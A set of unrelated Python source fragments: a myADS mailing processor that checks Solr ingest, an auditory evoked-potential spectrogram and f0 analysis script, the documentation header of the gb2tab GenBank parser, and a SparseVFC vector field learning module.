        mod_date = None
    # if the file is old or missing, sleep until the file is present and updated
    if not mod_date or mod_date < date:
        total_delay = 0
        while total_delay < sleep_timeout:
            total_delay += sleep_delay
            time.sleep(sleep_delay)
            try:
                mod_date = datetime.datetime.fromtimestamp(os.path.getmtime(astro_file))
            except OSError:
                mod_date = None
            if mod_date and mod_date > date:
                break
        else:
            # timeout reached before astronomy update completed
            # (while/else: runs only if the loop never hit break)
            logger.warning('Astronomy update did not complete within the {0}s timeout limit. Exiting.'.format(sleep_timeout))
            return None
    # make sure the ingest file exists and has enough bibcodes
    total_delay = 0
    while total_delay < sleep_timeout:
        astro_records = []
        try:
            with open(astro_file, 'r') as flist:
                for l in flist.readlines():
                    # sample line: 2019A&A...632A..94J K58-37447
                    astro_records.append(l.split()[0])
        except IOError:
            time.sleep(sleep_delay)
            total_delay += sleep_delay
            logger.warning('Error opening astronomy ingest file. Sleeping {0}s, for a total delay of {1}s'.
                           format(sleep_delay, total_delay))
            continue
        if len(astro_records) < 10:
            # Fewer than 10 lines is treated as a partial/in-progress file.
            time.sleep(sleep_delay)
            total_delay += sleep_delay
            logger.warning('Astronomy ingest file too small - ingest not complete. Sleeping {0}s, for a total delay of {1}s'.
                           format(sleep_delay, total_delay))
            continue
        else:
            break
    else:
        # while/else: timeout expired without a usable file
        return None
    # get several randomly selected bibcodes, in case one had ingest issues
    sample = random.sample(astro_records, config.get('ASTRO_SAMPLE_SIZE'))
    # check that the astronomy records have made it into solr
    total_delay = 0
    while total_delay < sleep_timeout:
        num_sampled = 0
        for s in sample:
            num_sampled += 1
            r = app.client.get('{0}?q=identifier:{1}&fl=bibcode,identifier,entry_date'.format(config.get('API_SOLR_QUERY_ENDPOINT'), s),
                               headers={'Authorization': 'Bearer ' + config.get('API_TOKEN')})
            # if there's a solr error, sleep then move to the next bibcode
            if r.status_code != 200:
                time.sleep(sleep_delay)
                total_delay += sleep_delay
                logger.error('Error retrieving bibcode {0} from Solr ({1} {2}), sleeping {3}s, for a total delay of {4}s'.
                             format(s, r.status_code, r.text, sleep_delay, total_delay))
                continue
            numfound = r.json()['response']['numFound']
            if numfound == 0:
                # nothing found - if all bibcodes in the sample were tried, sleep then start the while loop again
                if num_sampled == config.get('ASTRO_SAMPLE_SIZE'):
                    time.sleep(sleep_delay)
                    total_delay += sleep_delay
                    logger.warning('Astronomy ingest not complete for all in sample (sample: {0}). Sleeping {1}s, for a total delay of {2}s.'
                                   .format(sample, sleep_delay, total_delay))
                # if we haven't tried the others in the same, try the rest
                else:
                    logger.info(
                        'Astronomy ingest not complete (test astro bibcode: {0}). Trying the next in the sample.'
                        .format(s))
                continue
            elif numfound > 1:
                # returning this as true for now, since technically something was found
                logger.error('Too many records returned for bibcode {0}'.format(s))
                logger.info('Numfound: {0} for test bibcode {1}. Response: {2}. URL: {3}'.format(numfound, s,
                                                                                                json.dumps(r.json()),
                                                                                                r.url))
            # Found in Solr: ingest confirmed, return the test bibcode.
            return s
    logger.warning('Astronomy ingest did not complete within the {0}s timeout limit. Exiting.'.format(sleep_timeout))
    return None
def process_myads(since=None, user_ids=None, user_emails=None, test_send_to=None, admin_email=None, force=False,
frequency='daily', test_bibcode=None, **kwargs):
"""
Processes myADS mailings
:param since: check for new myADS users since this date
:param user_ids: users to process claims for, else all users - list (given as adsws IDs)
:param user_emails: users to process claims for, else all users - list (given as email addresses)
:param test_send_to: for testing; process a given user ID but send the output to this email address
:param admin_email: if provided, email is sent to this address at beginning and end of processing (does not trigger
for processing for individual users)
:param force: if True, will force processing of emails even if sent for a given user already that day
:param frequency: basestring; 'daily' or 'weekly'
:param test_bibcode: bibcode to query to test if Solr searcher has been updated
:return: no return
"""
if user_ids:
for u in user_ids:
tasks.task_process_myads({'userid': u, 'frequency': frequency, 'force': True,
'test_send_to': test_send_to, 'test_bibcode': test_bibcode})
logger.info('Done (just the supplied user IDs)')
return
if user_emails:
for u in user_emails:
r = app.client.get(config.get('API_ADSWS_USER_EMAIL') % u,
headers={'Accept': 'application/json',
'Authorization': 'Bearer {0}'.format(config.get('API_TOKEN'))}
)
if r.status_code == 200:
user_id = r.json()['id']
else:
logger.warning('Error getting user ID with email {0} from the API. Processing aborted for this user'.format(u))
continue
tasks.task_process_myads({'userid': user_id, 'frequency': frequency, 'force': True,
'test_send_to': test_send_to, 'test_bibcode': test_bibcode})
logger.info('Done (just the supplied user IDs)')
return
logging.captureWarnings(True)
if admin_email:
msg = utils.send_email(email_addr=admin_email,
payload_plain='Processing started for {}'.format(get_date()),
payload_html='Processing started for {}'.format(get_date()),
subject='myADS {0} processing has started'.format(frequency))
# if since keyword not provided, since is set to timestamp of last processing
if not since or isinstance(since, basestring) and since.strip() == "":
with app.session_scope() as session:
if frequency == 'daily':
kv = session.query(KeyValue).filter_by(key='last.process.daily').first()
else:
kv = session.query(KeyValue).filter_by(key='last.process.weekly').first()
if kv is not None:
since = kv.value
else:
since = '1971-01-01T12:00:00Z'
users_since_date = get_date(since)
logger.info('Processing {0} myADS queries since: {1}'.format(frequency, users_since_date.isoformat()))
last_process_date = get_date()
all_users = app.get_users(users_since_date.isoformat())
for user in all_users:
try:
tasks.task_process_myads.delay({'userid': user, 'frequency': frequency, 'force': force,
'test_bibcode': test_bibcode})
except: # potential backpressure (we are too fast)
time.sleep(2)
print 'Conn problem, retrying...', user
tasks.task_process_myads.delay({'userid': user, 'frequency': frequency, 'force': force,
'test_bibcode': test_bibcode})
# update last processed timestamp
with app.session_scope() as session:
if frequency == 'daily':
kv = session.query(KeyValue).filter_by(key='last.process.daily').first()
else:
kv = session.query(KeyValue).filter_by(key='last.process.weekly').first()
if kv is None:
if frequency == 'daily':
kv = KeyValue(key='last.process.daily', value=last_process_date.isoformat())
else:
kv = KeyValue(key='last.process.weekly', value=last_process_date.isoformat())
session.add(kv)
else:
kv.value = last_process_date.isoformat()
session.commit()
print 'Done submitting {0} myADS processing tasks for {1} users.'.format(frequency, | |
stimdur * 1000.0 # stim dur in ms
else:
sys.exit('not recognizable AEP software version...')
else:
fs = 20000.0
stimdur = 0.150
stimdur_ms = stimdur * 1000.0
si = file.si / 1000.0
isi = stimdur + si
stimPolarity = 2
# -------------- initialize parameters -------------------------------
# nrep = file.nRepetitions # number of repetitions
# overlap = win - gap
# window = np.hanning(np.floor(win * fs / 1000.0)) # window is a hanning window of 50 ms
# noverlap = int(np.floor(overlap * fs / 1000.0)) # overlaps noverlap samples of each segment,
# nfft = int(np.floor(win * fs / 1000.0)) # default 1000
# pad_to = int(np.floor((1.0 / freqResolution) * fs)) # convert freqResolution to number of data points [default nfft = 2^12].
# # # zero padding each segment to have nfft number of data points
# # # when nfft = fs, frequency resolution = 1 Hz
# take only 1 out of every 'interval' data points along the frequency axis, so that frequency resolution is 10 Hz on the spectrogram plot (for Python and Veusz).
freq_stepsize = 10.0 # step size on the frequency axis [default freq step size = 10 Hz]
interval = int(np.floor(freq_stepsize / freqResolution)) # make frequency interval to be 10 Hz, for Phtyon and Veusz plotting purposes
# ---- read stimulus token, first occurrence only ------------
stimToken = file.stimToken # stimulus token entered on MATLAB logbook, column 8
if dict_stimToken.get(stimToken) is not None:
stimpath, stimname = dict_stimToken[stimToken]
else:
sys.exit('not recognizable stimulus token...')
stimfs, stim = wavfile.read(hd + stimpath + stimname)
# make stimulus token to have the same sampling rate as recording fs [default = 20000]
up = 100 # set 'up' sampling at 100 (artibutrarily)
down = int(up * (stimfs / fs)) # compute 'down' sampling, to get desired new fs (relative to the old fs)
stim = signal.resample_poly(stim, up, down) # resample y to have a total of npts data points
if len(stim) > int(np.floor(fs * stimdur)):
stim = stim[0 : int(np.floor(fs * stimdur))]
# normalize stim amplitudes (time waveform)
stim = stim / np.amax(stim)
# -------------Read in stimulus and recording spectrograms ----------
for chan in range(nchans):
for polarity in range(npolarities):
# close all figures
plt.close('all')
# append chanstr and polaritystr to filepathstr and filenamestr
chanstr = '' if nchans==1 else '_chan' + str(chan)
polaritystr = polarityNames[polarity]
filepathstr = filepath + filepre + file.fileNumberString + chanstr + polaritystr
filenamestr = filepre + file.fileNumberString + chanstr + polaritystr
filename = filenamestr + '.npy'
annotationStimulus = stimToken
annotationRecording = filename + ', ' + file.experimentString
print('Reading file: ' + filepath + filename, flush=True)
# --- read in stimulus spectrogram data ---
T_ms = np.load(logfilepath + file.stimToken + '_stim_spectrogram_time_ms.npy')
F = np.load(logfilepath + file.stimToken + '_stim_spectrogram_freq.npy')
nV_S = np.load(logfilepath + file.stimToken + '_stim_spectrogram_nV.npy')
nV_S_veusz = np.load(logfilepath + file.stimToken + '_stim_spectrogram_nV_veusz.npy')
# compute (left, right, bottom, top) boundaries for imshow(), for stimulus and response
left = win/2.0 - gap/2.0
right = (stimdur_ms-win/2.0) + gap/2.0
bottom = -(freqResolution/2.0) * interval
top = F[-1] + (freqResolution/2.0)*interval
# define x tick labels
if int(stimdur*1000) == 150:
xticks = (25,50,75,100,125)
elif int(stimdur*1000) == 250:
xticks = (25,75,125,175,225)
else:
sys.exit('Unrecognizable stimulus duration')
# --- plot stimulus spectrogram ---
fig101 = plt.figure(101)
plt.imshow(nV_S_veusz, origin='lower', extent=(left, right, bottom, top), aspect='auto', cmap=dict_colorMap.get(colorMap_stimulus)) # , vmin=0, vmax=8000) # set zero origin at lower left corner, define the extent of axis boundaries (so that the x and y tick numbers will be correct), set aspect ratio to 'auto' (so that the spectrogram image will fill in the entire space), set color map to 'jet' for color and 'gray_r' for gray scale, set vmin and vmax for the lower and upper limits along the z axis (i.e., amplitude axis)
plt.title(annotationStimulus)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
plt.xticks(ticks=xticks)
# plt.colorbar()
if setFigureLocationFlag:
if 'Qt' in backend: # Qt (e.g., Qt5Agg)
mgr = plt.get_current_fig_manager() # get a manager for current figure
mgr.window.setGeometry(space, space, dx, dy) # set geometry of current figure (x, y, width, height) in pixels
else:
sys.exit('Unrecognizable graphical backend')
plt.show(block=False)
# --- read in response spectrogram data ---
t_ms = np.load(filepathstr + '_spectrogram_time_ms.npy')
f = np.load(filepathstr + '_spectrogram_freq.npy')
nV = np.load(filepathstr + '_spectrogram_nV.npy')
nV_veusz = np.load(filepathstr + '_spectrogram_nV_veusz.npy')
# --- plot response spectrogram ---
fig102 = plt.figure(102)
plt.imshow(nV_veusz, origin='lower', extent=(left, right, bottom, top), aspect='auto', cmap=dict_colorMap.get(colorMap_recording)) # , vmin=0, vmax=8000) # set zero origin at lower left corner, define the extent of axis boundaries (so that the x and y tick numbers will be correct), set aspect ratio to 'auto' (so that the spectrogram image will fill in the entire space), set color map to 'jet' for color and 'gray_r' for gray scale, set vmin and vmax for the lower and upper limits along the z axis (i.e., amplitude axis)
plt.title(annotationRecording)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
plt.xticks(ticks=xticks)
# plt.colorbar()
if setFigureLocationFlag:
if 'Qt' in backend: # Qt (e.g., Qt5Agg)
mgr = plt.get_current_fig_manager() # get a manager for current figure
mgr.window.setGeometry(space+dx+space, space, dx, dy) # set geometry of current figure (x, y, width, height) in pixels
else:
sys.exit('Unrecognizable graphical backend')
plt.show(block=False)
###############################
# --- Find spectral maximum ---
###############################
#----------------- extract f0s for stimulus ----------------
if stimToken not in stimTokens: # compute stimulus f0s, only upon the first encounter of a stimToken
stimTokens.append(stimToken)
highIndices = np.argwhere(F <= high) # find the upper frequency index of the searching range
highIndex = highIndices[-1, 0] + 1
lowIndices = np.argwhere(F >= low) # find the lower frequency index of the searching range
lowIndex = lowIndices[0, 0]
F_range = F[lowIndex:highIndex]
nV_S_range = nV_S[lowIndex:highIndex, :]
# in the range of T_ms, find the maximum y and its index
f0amps = np.full(T_ms.shape, None)
indices = np.full(T_ms.shape, None)
for i in range(len(T_ms)):
f0amps[i] = np.amax(nV_S_range[:, i])
indices[i] = np.argmax(nV_S_range[:, i])
# use the index to find the corresponding frequency
f0s = np.full(T_ms.shape, None)
for j in range(len(T_ms)):
f0s[j] = F_range[indices[j]]
f0s = f0s.astype(float) # force f0s to float64
# output f0s
np.save(f0ContourPath + 'f0_' + stimToken + '.npy', f0s)
else:
f0s = np.load(f0ContourPath + 'f0_' + stimToken + '.npy', allow_pickle=True)
# --- plot stimulus f0s ---
fig103 = plt.figure(103)
plt.plot(T_ms, f0s, 'k') # {b: blue, k: black, r: red, etc}, {o: circle, +: plus, x: cross, etc}
plt.title('F0s of the stimulus, ' + stimToken)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
if setFigureLocationFlag:
if 'Qt' in backend: # Qt (e.g., Qt5Agg)
mgr = plt.get_current_fig_manager() # get a manager for current figure
mgr.window.setGeometry(space, int(space+dy*6/10+space), dx, dy) # set geometry of current figure (x, y, width, height) in pixels
elif 'wx' in backend:
print('wx backend')
else:
sys.exit('Unrecognizable graphical backend')
plt.show(block=False)
#----------------- extract f0s for a recording ----------------
highIndices = np.argwhere(f <= high) # find the upper frequency index of the searching range
highIndex = highIndices[-1, 0] + 1
lowIndices = np.argwhere(f >= low) # find the lower frequency index of the searching range
lowIndex = lowIndices[0, 0]
f_range = f[lowIndex:highIndex]
nV_range = nV[lowIndex:highIndex, :]
# in the range of T_ms, find the maximum y and its index
f0amp = np.full(t_ms.shape, None)
index = np.full(t_ms.shape, None)
for i in range(len(t_ms)):
f0amp[i] = np.amax(nV_range[:, i])
index[i] = np.argmax(nV_range[:, i])
# use the index to find the corresponding frequency
f0 = np.full(t_ms.shape, None)
for j in range(len(t_ms)):
f0[j] = f_range[index[j]]
f0 = f0.astype(float) # force f0 to float64
# calculate Spectral Amplitude (SA)
sa = np.mean(abs(f0amp))
# --- plot response f0s ---
fig104 = plt.figure(104)
plt.plot(t_ms, f0, 'r')
plt.title('F0s of a recording, ' + annotationRecording)
plt.xlabel('Time (ms)')
plt.ylabel('Frequency (Hz)')
| |
<gh_stars>1-10
#!/usr/local/python/bin/python
# gb2tab - comprehensive GenBank format parser/extractor
#
# Copyright (C) 2004 - 2008 <NAME>, <EMAIL>
#
# gb2tab is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# gb2tab is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
"""
gb2tab v 1.2.1 (command line program behind the FeatureExtract webserver)
NAME
gb2tab - extract sequence and annotation (intron/exon etc)
from GenBank format files.
SYNOPSIS
gb2tab [-f 'CDS,mRNA,...'] [options...] [files...]
DESCRIPTION
gb2tab is a tool for extracting sequence and annotation
(such as intron / exon structure) information from GenBank
format files.
This tool handles overlapping genes gracefully.
If no files are specified input is assumed to be on STDIN.
Several GenBank files can be concatenated to STDIN.
The extracted sequences are streamed to STDOUT with one
entry per line in the following format (tab separated):
name seq ann com
name: The sequence id. See the --genename, --locustag and
--entryname options below.
seq: The DNA sequence it self. UPPERCASE is used for the
main sequence, lowercase is used for flanks (if any).
ann: Single letter sequence annotation. Position for position
the annotation describes the DNA sequence: the first
letter in the annotation describes the annotation for
the first position in the DNA sequence and so forth.
The annotation code is defined as follows:
FEATURE BLOCKS (AKA. "EXON BLOCKS")
( First position
E Exon
T tRNA exonic region
R rRNA / generic RNA exonic region
P Promotor
X Unknown feature type
) Last position
? Ambiguous first or last position
[ First UTR region position
3 3'UTR
5 5'UTR
] Last UTR region position
See also the --block-chars option, for a further
explanation of feature blocks and exonic regions.
INTRONS and FRAMESHIFTS
D First intron position (donor site)
I Intron position
A Last intron position (acceptor site)
< Start of frameshift
F Frameshift
> End of frameshift
REGIONS WITHOUT FEATURES
. NULL annotation (no annotation).
ONLY IN FLANKING REGIONS:
+ Other feature defined on the SAME STRAND
as the current entry.
- Other feature defined on the OPPOSITE STRAND
relative to the current entry.
# Multiple or overlapping features.
A..Z: Feature on the SAME STRAND as the current entry.
a..z: Feature on the OPPOSITE STRAND as the current entry.
See the -e option for a description of which features
are annotated in the flanking regions.
The options --flank_ann_full (default) and
--flank_ann_presence determine if full annotation
(+upper/lower case) or annotation of presence/absence
(+/- and #) is used.
com: Comments (free text). All text, extra information etc
defined in the GenBank files are concatenated into a single
comment.
The following extra information is added by this program:
*) GenBank accession ID.
*) Source (organism)
*) Feature type (e.g. "CDS" or "rRNA")
*) Strand ("+" or "-").
*) Spliced DNA sequence. Simply the DNA sequence defined
by the JOIN statement.
This is provided for two reasons: 1) to overcome negative
frameshifts; 2) as an easy way of extracting the sequence
of the spliced product. See also the --splic_always and
--flank_splic options below.
*) Spliced DNA annotation.
OPTIONS
The following options are available.
-f X, --feature_type=X
Define which feature type(s) to extract.
Default is 'CDS' which is the most general way
to annotate protein coding genes.
Multiple features can be selected by specifying a comma
separated list - for example "CDS,rRNA,tRNA".
Special keywords:
ALL: Using the keyword "ALL", will extend the list to all
feature types listed in each GenBank file.
Please notice: This can occasionally lead to problems
in files that use multiple feature types to cover the
same actual feature (e.g uses both "gene" and "CDS").
MOST: Covers the following feature types:
CDS,3'UTR,5'UTR,
promoter,-35_signal,-10_signal,RBS,
rRNA,tRNA,snoRNA,scRNA,misc_RNA,
misc_feature
The keyword can be also be included in the user specified list.
For example "MOST,novel_feature" will construct a list containing
the list mention above + the new feature type "novel_feature".
-e X, --flank_features=X
Define which features to annotate in flanking regions.
The scheme for specifying features is the same as in the
-f option (see above).
The default value is "MOST".
If no flanking regions are requested (see options -b and -a
below) this option is ignored.
-i, --intergenic
Extract intergenic regions. When this option is used, all
regions in between the features defined with the -f option
are extracted rather than the features themselves.
Please notice that features specified using the -e options
may be present in the intergenic regions.
Intergenic regions will always be extracted from the "+" strand.
-s, --splice
For intron containing sequences output the spliced version as
the main result (normally this information goes into the
comments). If this options is used the full length product will
be added to the comments instead.
Using this option will force the inclusion of flanks (if any)
in the spliced product. See also option --flank_splic.
-x, --spliced_only
Only output intron containing sequences. Can be used in
combination with the -s option.
-b X, --flank_before=X
Extract X basepairs upstream of each sequence.
-a X, --flank_after=X
Extract X basepairs downstream of each sequence.
-h, --help
Print this help page and exit.
-n, --dry-run
Run through all extraction steps but do not output any
data. Useful for debugging bad GenBank files in combination
with the verbose options.
-v, --verbose
Output messages about progress, details about the GenBank
file etc. to STDERR. Useful for finding errors.
-q, --quiet
Suppress all warnings, error messages and verbose info.
The exit value will still be non-zero if an error is
encountered.
--flank_ann_presence
Annotate presence/absence and relative strandness of
features in the flanking regions.
Features - of any kind - are annotated with "+" if they are
on the SAME STRAND as the extracted feature, and "-" if they
are on the OPPOSITE STRAND. "#" marks regions covered by
multiple features.
This option is very useful for use with OligoWiz-2.0
(www.cbs.dtu.dk/services/OligoWiz2).
--flank_ann_full
Default: Include full-featured annotation in the flanking regions.
Features on the SAME STRAND as the extracted is uppercase -
features on the OPPOSITE STRAND is lowercase.
In case of regions covered by multiple features, the
feature defined FIRST by the -e option has preference.
--flank_splic
Also include flanking regions in the spliced product.
Default is to ignore flanks.
--splic_always
Include the spliced product for ALL entries.
Default is to only print spliced product information for
intron/frameshift containing entries.
--frameshift=X
"Introns" shorter than X bp (default 15bp) are considered
frameshifts. This includes negative frameshifts.
--block-chars=XYZ|"Feat1=XYZ,Feat2=ZYX,..."
Specify which characters to use for annotation of the
extracted feature types. For spliced feature (e.g CDS)
each exonic block is annotated using the specified characters.
Three characters must be supplied (for each feature type):
First position, internal positions, last position.
For example the string "(E)" will cause a 10bp feature block
(i.e. a CDS exon block) to be annotated like this: (EEEEEEEE)
Introns are filled in as DII..IIA
By default the program determine the annotation chars to be
based on the type of feature being extracted:
(E) CDS, mRNA
(T) tRNA
(R) rRNA, snoRNA, snRNA, misc_RNA, scRNA
(P) promotor
[5] 5'UTR
[3] 3'UTR
(X) Everything else.
This table can be expanded (and overwritten) by supplying a
list of relations between feature type ans block chars.
For example:
--block-chars="mRNA=[M],gene=<G>,repeat=QQQ"
--genename
Try to extract the gene name from the /gene="xxxx"
tag (this is usually the classical gene name, e.g. HTA1)
If this is not possible fall back to 1) locustag
or 2) entryname (see below).
--locustag
Try to extract the locus tag (usually the systematic
gene name) from the /locus_tag="xxxx" tag. Fall back
to using the entryname if not possible (see below).
This is the default behavior.
--entryname
Use the main GenBank entry name (the "LOCUS" name) as
the base of the sequence names.
KNOWN ISSUES
This program DOES NOT support entries which spans multiple
GenBank files. It is very unlikely this will ever be supported.
(Please notice that the webserver version supports expanding
reference GenBank entries to the listed subentries automatically).
REFERENCE
<NAME>, 2005.
"FeatureExtract - extraction of sequence annotation made easy".
Nucleic Acids Research, 2005, Vol. 33, Web Server issue W567-W569
WEB
http://www.cbs.dtu.dk/services/FeatureExtract
The webpage contains detailed instructions and examples.
The most recent version of this program is downloadable
from this web address.
AUTHOR
<NAME>, <EMAIL>
Oct-Dec 2004
Jan-Mar 2005
Aug 2005
Sep 2008 - bugfix + better IUPAC support
"""
import sys,string,re
# The Exception is used for communicating the end of the input stream has be reached
class ExEndOfFile(Exception):
    """Signals that the end of the input stream has been reached."""
# The class is basically just a slightly intelligent record (it knows how to be
# sorted) that stores the processed information for each feature block.
class Rec:
def __init__(self):
self.first = -1
self.last = -1
self.comp = False
self.strand = "+"
self.strSeq = ""
self.strAnn = ""
self.strSpliced = ""
self.strSpcAnn = ""
self.featType = | |
<gh_stars>1-10
import numpy as np
import scipy
import numpy.matlib
def norm(X, V, T):
    """Normalize X and Y = X + V to zero mean and unit scale; rescale T to match.

    The grid T is shifted and scaled with the averages of X's and Y's
    centering and scaling parameters.

    Arguments
    ---------
    X: 'np.ndarray'
        Current state. This corresponds to, for example, the spliced transcriptomic state.
    V: 'np.ndarray'
        Velocity estimates in delta t, e.g. as inferred by dynamo, velocyto or scvelo.
    T: 'np.ndarray'
        Current state on a grid, often used to visualize the vector field.

    Returns
    -------
    X, V, T: 'np.ndarray'
        The normalized state, velocity and grid.
    norm_dict: 'dict'
        The means ('xm', 'ym') and scales ('xscale', 'yscale') used for the
        normalization, so the transform can be inverted later.
    """
    Y = X + V
    n, m = X.shape[0], V.shape[0]
    xm = np.mean(X, 0)
    ym = np.mean(Y, 0)
    # Center X and Y by their own means; center T by the average of the two.
    x = X - xm[None, :]
    y = Y - ym[None, :]
    t = T - (xm[None, :] + ym[None, :]) / 2
    # Scale by the RMS norm of the centered data.
    xscale = np.sqrt(np.sum(x ** 2) / n)
    yscale = np.sqrt(np.sum(y ** 2) / m)
    X_norm = x / xscale
    Y_norm = y / yscale
    T_norm = t / ((xscale + yscale) / 2)
    # The normalized velocity is defined by the normalized displacement.
    V_norm = Y_norm - X_norm
    norm_dict = {"xm": xm, "ym": ym, "xscale": xscale, "yscale": yscale}
    return X_norm, V_norm, T_norm, norm_dict
def auto_con_K(self, x, y, beta):
    """Construct the Gaussian kernel K with K[i, j] = k(x_i, y_j) = exp(-beta * ||x_i - y_j||^2).

    NOTE(review): ``self`` is accepted for call-compatibility with existing
    callers but is not used; this function also duplicates ``con_K`` — confirm
    whether one of the two can be retired.

    Arguments
    ---------
    x: 'np.ndarray'
        Original training data points (n x d).
    y: 'np.ndarray'
        Control points used to build kernel basis functions (m x d).
    beta: 'float'
        Width parameter of the Gaussian kernel.

    Returns
    -------
    K: 'np.ndarray'
        The (n x m) kernel used to represent the vector field function.
        Singleton dimensions are squeezed, matching the original tiling code.
    """
    # Pairwise squared Euclidean distances via broadcasting. This replaces
    # the deprecated np.matlib.tile/np.transpose construction and avoids
    # materializing two (n, d, m) temporaries.
    diff = x[:, None, :] - y[None, :, :]             # (n, m, d)
    sq_dist = np.squeeze(np.sum(diff ** 2, axis=2))  # (n, m), squeezed as before
    return np.exp(-beta * sq_dist)
def SparseVFC(X, Y, Grid, M = 100, a = 5, beta = 0.1, ecr = 1e-5, gamma = 0.9, lambda_ = 3, minP = 1e-5, MaxIter = 500, theta = 0.75, div_cur_free_kernels = False):
    """Apply sparseVFC (vector field consensus) to learn a functional form of the vector field on the entire space robustly and efficiently.

    Reference: "Regularized vector field learning with sparse approximation for
    mismatch removal", Ma, Jiayi, et al., Pattern Recognition.

    Arguments
    ---------
    X: 'np.ndarray'
        Current state. This corresponds to, for example, the spliced transcriptomic state.
    Y: 'np.ndarray'
        Velocity estimates in delta t, e.g. as inferred by velocyto, scvelo or dynamo.
    Grid: 'np.ndarray'
        Grid points on which the learned vector field is evaluated (for visualization).
    M: 'int' (default: 100)
        Number of basis functions used to approximate the vector field.
    a: 'float' (default: 5)
        Parameter of the outlier model: outliers are assumed uniformly
        distributed over a variation space of volume a.
    beta: 'float' (default: 0.1)
        Parameter of the Gaussian kernel, k(x, y) = exp(-beta * ||x - y||^2).
    ecr: 'float' (default: 1e-5)
        Minimum energy change rate below which the EM iteration stops.
    gamma: 'float' (default: 0.9)
        Initial percentage of inliers in the samples; updated during EM, so the
        starting value is not critical.
    lambda_: 'float' (default: 3)
        Trade-off between goodness of data fit and regularization.
    minP: 'float' (default: 1e-5)
        Lower bound applied to the posterior probability matrix P to keep the
        linear system well conditioned.
    MaxIter: 'int' (default: 500)
        Maximum number of EM iterations.
    theta: 'float' (default: 0.75)
        A sample is regarded as an inlier when its posterior inlier
        probability exceeds theta.
    div_cur_free_kernels: 'bool' (default: False)
        Whether to use the divergence-/curl-free kernel instead of the
        Gaussian kernel.

    Returns
    -------
    VecFld: 'dict'
        Contains X (control points), Y, beta, V, C, P, VFCIndex, sigma2, grid
        and grid_V, where V = f(X), P is the posterior probability and
        VFCIndex indexes the inliers found by VFC. Note that
        con_K(Grid, ctrl_pts, beta).dot(C) gives the predicted velocity at any
        point in the gene expression state space.
    """
    N, D = Y.shape
    # --- Construct the kernel matrices over M control points ---
    M = 500 if M is None else M
    tmp_X = np.unique(X, axis = 0)  # deduplicate rows before sampling control points
    idx = np.random.RandomState(seed=0).permutation(tmp_X.shape[0])  # reproducible random selection
    idx = idx[range(min(M, tmp_X.shape[0]))]
    ctrl_pts = tmp_X[idx, :]
    K = con_K(ctrl_pts, ctrl_pts, beta) if div_cur_free_kernels is False else con_K_div_cur_free(ctrl_pts, ctrl_pts)[0]
    U = con_K(X, ctrl_pts, beta) if div_cur_free_kernels is False else con_K_div_cur_free(X, ctrl_pts)[0]
    grid_U = con_K(Grid, ctrl_pts, beta) if div_cur_free_kernels is False else con_K_div_cur_free(Grid, ctrl_pts)[0]
    M = ctrl_pts.shape[0]
    # --- EM initialization ---
    V = np.zeros((N, D))
    C = np.zeros((M, D))
    iteration, tecr, E = 1, 1, 1  # renamed from `iter` to avoid shadowing the builtin
    sigma2 = np.sum((Y - V)**2) / (N * D)
    while iteration < MaxIter and tecr > ecr and sigma2 > 1e-8:
        # E-step: posterior inlier probabilities and energy.
        E_old = E
        P, E = get_P(Y, V, sigma2, gamma, a)
        # np.trace replaces the removed scipy.trace alias.
        E = E + lambda_ / 2 * np.trace(C.T.dot(K).dot(C))
        tecr = abs((E - E_old) / E)
        # M-step: solve the regularized linear system for C.
        P = np.maximum(P, minP)  # np.maximum replaces the removed scipy.maximum alias
        # Row-wise weighting of U by P; equivalent to U.T * repmat(P.T, M, 1)
        # without the deprecated numpy.matlib dependency.
        UP = U.T * P
        C = scipy.linalg.lstsq(UP.dot(U) + lambda_ * sigma2 * K, UP.dot(Y))[0]
        # Update V and sigma^2.
        V = U.dot(C)
        Sp = np.sum(P)
        sigma2 = np.sum(P * np.sum((Y - V)**2, 1)) / (Sp * D)
        # Update gamma, clamped to [0.05, 0.95].
        numcorr = len(np.where(P > theta)[0])
        gamma = numcorr / X.shape[0]
        if gamma > 0.95:
            gamma = 0.95
        elif gamma < 0.05:
            gamma = 0.05
        iteration += 1
    grid_V = np.dot(grid_U, C)
    VecFld = {"X": ctrl_pts, "Y": Y, "beta": beta, "V": V, "C": C, "P": P,
              "VFCIndex": np.where(P > theta)[0], "sigma2": sigma2, "grid": Grid, "grid_V": grid_V}
    return VecFld
def con_K(x, y, beta):
    """Construct the Gaussian kernel K with K[i, j] = k(x_i, y_j) = exp(-beta * ||x_i - y_j||^2).

    Arguments
    ---------
    x: 'np.ndarray'
        Original training data points (n x d).
    y: 'np.ndarray'
        Control points used to build kernel basis functions (m x d).
    beta: 'float' (default: 0.1)
        Parameter of the Gaussian kernel, k(x, y) = exp(-beta*||x-y||^2).

    Returns
    -------
    K: 'np.ndarray'
        The (n x m) kernel used to represent the vector field function.
        Singleton dimensions are squeezed, matching the original tiling code.
    """
    # Pairwise squared Euclidean distances via broadcasting. This replaces
    # the deprecated np.matlib.tile/np.transpose construction and avoids
    # materializing two (n, d, m) temporaries.
    diff = x[:, None, :] - y[None, :, :]             # (n, m, d)
    sq_dist = np.squeeze(np.sum(diff ** 2, axis=2))  # (n, m), squeezed as before
    return np.exp(-beta * sq_dist)
def get_P(Y, V, sigma2, gamma, a):
    """Estimate the posterior inlier probability P and part of the energy E.

    Arguments
    ---------
    Y: 'np.ndarray'
        Original data.
    V: 'np.ndarray'
        Original data.
    sigma2: 'float'
        sigma2 is defined as sum(sum((Y - V)**2)) / (N * D).
    gamma: 'float'
        Percentage of inliers in the samples. This is an initial value for the
        EM iteration, and it is not important.
    a: 'float'
        Parameter of the outlier model. The outliers are assumed to obey a
        uniform distribution, and the volume of the outliers' variation space is a.

    Returns
    -------
    P: 'np.ndarray'
        Posterior probability, related to equation 27.
    E: 'np.ndarray'
        Energy, related to equation 26.
    """
    D = Y.shape[1]
    residual2 = np.sum((Y - V) ** 2, 1)  # squared residual per sample
    inlier_score = np.exp(-residual2 / (2 * sigma2))
